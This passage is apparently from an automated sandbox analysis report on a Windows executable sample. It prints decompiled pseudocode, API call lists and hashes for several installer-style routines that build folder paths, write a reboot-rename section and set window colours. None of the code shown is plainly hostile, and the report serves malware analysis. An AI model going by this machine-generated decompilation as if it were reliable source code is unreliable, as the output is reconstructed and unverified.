                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t44;
                                                				WCHAR* _t45;
                                                				signed char _t47;
                                                				signed int _t48;
                                                				short _t59;
                                                				short _t61;
                                                				short _t63;
                                                				void* _t71;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				short _t81;
                                                				short _t82;
                                                				signed char _t84;
                                                				signed int _t85;
                                                				void* _t98;
                                                				void* _t104;
                                                				intOrPtr* _t105;
                                                				void* _t107;
                                                				WCHAR* _t108;
                                                				void* _t110;
                                                
                                                				_t107 = __esi;
                                                				_t104 = __edi;
                                                				_t71 = __ebx;
                                                				_t44 = _a8;
                                                				if(_t44 < 0) {
                                                					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                				}
                                                				_push(_t71);
                                                				_push(_t107);
                                                				_push(_t104);
                                                				_t105 =  *0x434f38 + _t44 * 2;
                                                				_t45 = 0x432ea0;
                                                				_t108 = 0x432ea0;
                                                				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                					_t108 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				_t81 =  *_t105;
                                                				_a8 = _t81;
                                                				if(_t81 == 0) {
                                                					L43:
                                                					 *_t108 =  *_t108 & 0x00000000;
                                                					if(_a4 == 0) {
                                                						return _t45;
                                                					}
                                                					return E0040653D(_a4, _t45);
                                                				} else {
                                                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                						_t98 = 2;
                                                						_t105 = _t105 + _t98;
                                                						if(_t81 >= 4) {
                                                							if(__eflags != 0) {
                                                								 *_t108 = _t81;
                                                								_t108 = _t108 + _t98;
                                                								__eflags = _t108;
                                                							} else {
                                                								 *_t108 =  *_t105;
                                                								_t108 = _t108 + _t98;
                                                								_t105 = _t105 + _t98;
                                                							}
                                                							L42:
                                                							_t82 =  *_t105;
                                                							_a8 = _t82;
                                                							if(_t82 != 0) {
                                                								_t81 = _a8;
                                                								continue;
                                                							}
                                                							goto L43;
                                                						}
                                                						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                						_t47 =  *_t105;
                                                						_t48 = _t47 & 0x000000ff;
                                                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                						_t85 = _t84 & 0x000000ff;
                                                						_v28 = _t48 | 0x00008000;
                                                						_t77 = 2;
                                                						_v16 = _t85;
                                                						_t105 = _t105 + _t77;
                                                						_v24 = _t48;
                                                						_v20 = _t85 | 0x00008000;
                                                						if(_a8 != _t77) {
                                                							__eflags = _a8 - 3;
                                                							if(_a8 != 3) {
                                                								__eflags = _a8 - 1;
                                                								if(__eflags == 0) {
                                                									__eflags = (_t48 | 0xffffffff) - _v12;
                                                									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                								}
                                                								L38:
                                                								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                								_t45 = 0x432ea0;
                                                								goto L42;
                                                							}
                                                							_t78 = _v12;
                                                							__eflags = _t78 - 0x1d;
                                                							if(_t78 != 0x1d) {
                                                								__eflags = L"ppingA" + (_t78 << 0xb);
                                                								E0040653D(_t108, L"ppingA" + (_t78 << 0xb));
                                                							} else {
                                                								E00406484(_t108,  *0x434f08);
                                                							}
                                                							__eflags = _t78 + 0xffffffeb - 7;
                                                							if(__eflags < 0) {
                                                								L29:
                                                								E004067C4(_t108);
                                                							}
                                                							goto L38;
                                                						}
                                                						if( *0x434f84 != 0) {
                                                							_t77 = 4;
                                                						}
                                                						_t121 = _t48;
                                                						if(_t48 >= 0) {
                                                							__eflags = _t48 - 0x25;
                                                							if(_t48 != 0x25) {
                                                								__eflags = _t48 - 0x24;
                                                								if(_t48 == 0x24) {
                                                									GetWindowsDirectoryW(_t108, 0x400);
                                                									_t77 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										goto L26;
                                                									}
                                                									_t59 =  *0x434f04;
                                                									_t77 = _t77 - 1;
                                                									__eflags = _t59;
                                                									if(_t59 == 0) {
                                                										L22:
                                                										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                										__eflags = _t61;
                                                										if(_t61 != 0) {
                                                											L24:
                                                											 *_t108 =  *_t108 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                										_a8 = _t61;
                                                										__imp__CoTaskMemFree(_v8);
                                                										__eflags = _a8;
                                                										if(_a8 != 0) {
                                                											goto L26;
                                                										}
                                                										goto L24;
                                                									}
                                                									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                									__eflags = _t63;
                                                									if(_t63 == 0) {
                                                										goto L26;
                                                									}
                                                									goto L22;
                                                								}
                                                								goto L26;
                                                							}
                                                							GetSystemDirectoryW(_t108, 0x400);
                                                							goto L26;
                                                						} else {
                                                							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                							if( *_t108 != 0) {
                                                								L27:
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L29;
                                                							}
                                                							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                							L26:
                                                							if( *_t108 == 0) {
                                                								goto L29;
                                                							}
                                                							goto L27;
                                                						}
                                                					}
                                                					goto L43;
                                                				}
                                                			}





























                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x00406580
                                                0x00406585
                                                0x00406596
                                                0x00406596
                                                0x0040659e
                                                0x0040659f
                                                0x004065a0
                                                0x004065a1
                                                0x004065a4
                                                0x004065ac
                                                0x004065ae
                                                0x004065bf
                                                0x004065c2
                                                0x004065c2
                                                0x004065c6
                                                0x004065cc
                                                0x004065cf
                                                0x004067aa
                                                0x004067aa
                                                0x004067b5
                                                0x004067c1
                                                0x004067c1
                                                0x00000000
                                                0x004065d5
                                                0x004065da
                                                0x004065ef
                                                0x004065f0
                                                0x004065f6
                                                0x00406788
                                                0x00406796
                                                0x00406799
                                                0x00406799
                                                0x0040678a
                                                0x0040678d
                                                0x00406790
                                                0x00406792
                                                0x00406792
                                                0x0040679b
                                                0x0040679b
                                                0x004067a1
                                                0x004067a4
                                                0x004065d7
                                                0x00000000
                                                0x004065d7
                                                0x00000000
                                                0x004067a4
                                                0x004065fc
                                                0x004065ff
                                                0x0040660e
                                                0x00406615
                                                0x00406621
                                                0x00406624
                                                0x00406627
                                                0x00406628
                                                0x0040662d
                                                0x00406633
                                                0x00406636
                                                0x00406639
                                                0x0040672c
                                                0x00406731
                                                0x00406764
                                                0x00406769
                                                0x0040676e
                                                0x00406773
                                                0x00406773
                                                0x00406778
                                                0x0040677e
                                                0x00406781
                                                0x00000000
                                                0x00406781
                                                0x00406733
                                                0x00406736
                                                0x00406739
                                                0x0040674e
                                                0x00406755
                                                0x0040673b
                                                0x00406742
                                                0x00406742
                                                0x0040675d
                                                0x00406760
                                                0x00406724
                                                0x00406725
                                                0x00406725
                                                0x00000000
                                                0x00406760
                                                0x00406646
                                                0x0040664a
                                                0x0040664a
                                                0x0040664b
                                                0x0040664d
                                                0x0040668a
                                                0x0040668d
                                                0x0040669d
                                                0x004066a0
                                                0x004066a8
                                                0x004066ae
                                                0x004066ae
                                                0x00406709
                                                0x00406709
                                                0x0040670b
                                                0x00000000
                                                0x00000000
                                                0x004066b2
                                                0x004066b7
                                                0x004066b8
                                                0x004066ba
                                                0x004066d1
                                                0x004066df
                                                0x004066e5
                                                0x004066e7
                                                0x00406705
                                                0x00406705
                                                0x00406705
                                                0x00000000
                                                0x00406705
                                                0x004066ed
                                                0x004066f6
                                                0x004066f9
                                                0x004066ff
                                                0x00406703
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406703
                                                0x004066cb
                                                0x004066cd
                                                0x004066cf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066cf
                                                0x00000000
                                                0x00406709
                                                0x00406695
                                                0x00000000
                                                0x0040664f
                                                0x0040666d
                                                0x00406676
                                                0x00406713
                                                0x00406717
                                                0x0040671f
                                                0x0040671f
                                                0x00000000
                                                0x00406717
                                                0x00406680
                                                0x0040670d
                                                0x00406711
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406711
                                                0x0040664d
                                                0x00000000
                                                0x004065da

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,00000000,?,76F1EA30), ref: 004066A8
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ppingA
                                                • API String ID: 4260037668-2727516806
                                                • Opcode ID: 03b6c86d0f000171db59b2cc8690753f548b227a8176050573a5c3190704fa58
                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                • Opcode Fuzzy Hash: 03b6c86d0f000171db59b2cc8690753f548b227a8176050573a5c3190704fa58
                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406183(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
                                                				WCHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x430908 = 0x55004e;
                                                				 *0x43090c = 0x4c;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                						_t53 = _t52 + 0x10;
                                                						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E004060DF(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E0040602D(_t44, 0, 1));
                                                					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}



















                                                0x00406183
                                                0x0040618c
                                                0x00406193
                                                0x0040619d
                                                0x004061b1
                                                0x004061d9
                                                0x004061e4
                                                0x004061e8
                                                0x00406208
                                                0x0040620f
                                                0x00406219
                                                0x00406226
                                                0x0040622b
                                                0x00406230
                                                0x00406234
                                                0x00406243
                                                0x00406245
                                                0x00406252
                                                0x00406256
                                                0x004062f1
                                                0x00000000
                                                0x0040626c
                                                0x00406279
                                                0x0040629d
                                                0x004062a1
                                                0x004062c0
                                                0x004062c4
                                                0x004062c4
                                                0x004062c6
                                                0x004062cf
                                                0x004062da
                                                0x004062e5
                                                0x004062eb
                                                0x00000000
                                                0x004062eb
                                                0x004062a3
                                                0x004062a6
                                                0x004062b1
                                                0x004062ad
                                                0x004062af
                                                0x004062b0
                                                0x004062b0
                                                0x004062b8
                                                0x004062ba
                                                0x00000000
                                                0x004062ba
                                                0x00406284
                                                0x0040628a
                                                0x00000000
                                                0x0040628a
                                                0x00406256
                                                0x00406234
                                                0x004061b3
                                                0x004061be
                                                0x004061c7
                                                0x004061cb
                                                0x00000000
                                                0x00000000
                                                0x004061cb
                                                0x004062fc

                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                • wsprintfA.USER32 ref: 00406202
                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                • GlobalFree.KERNEL32 ref: 004062EB
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}









                                                0x00404512
                                                0x004045c8
                                                0x00000000
                                                0x004045c8
                                                0x00404523
                                                0x00404527
                                                0x00000000
                                                0x00404541
                                                0x00404541
                                                0x0040454a
                                                0x00000000
                                                0x00000000
                                                0x0040454c
                                                0x00404558
                                                0x0040455b
                                                0x0040455b
                                                0x00404561
                                                0x00404567
                                                0x00404567
                                                0x00404573
                                                0x00404579
                                                0x00404580
                                                0x00404583
                                                0x00404586
                                                0x00404588
                                                0x00404588
                                                0x00404590
                                                0x00404596
                                                0x00404596
                                                0x004045a0
                                                0x004045a5
                                                0x004045a8
                                                0x004045ad
                                                0x004045b0
                                                0x004045b0
                                                0x004045c0
                                                0x004045c0
                                                0x00000000
                                                0x004045c3

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                • GetSysColor.USER32(?), ref: 00404586
                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                				_t66 = E00402D84(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x44) = 0x3ff;
                                                					}
                                                					if( *__edi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x38) = __ebx;
                                                						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                						if( *(__ebp - 0x44) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                										__eax = __ebp - 0x50;
                                                										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x4c) = __ecx;
                                                											 *(__ebp - 0x50) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x50 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x50);
                                                												} else {
                                                													__edi =  *(__ebp - 0x4c);
                                                													__edi =  ~( *(__ebp - 0x4c));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x50) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                														__edi = __edi + 1;
                                                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                														__eax = __ebp + 0xa;
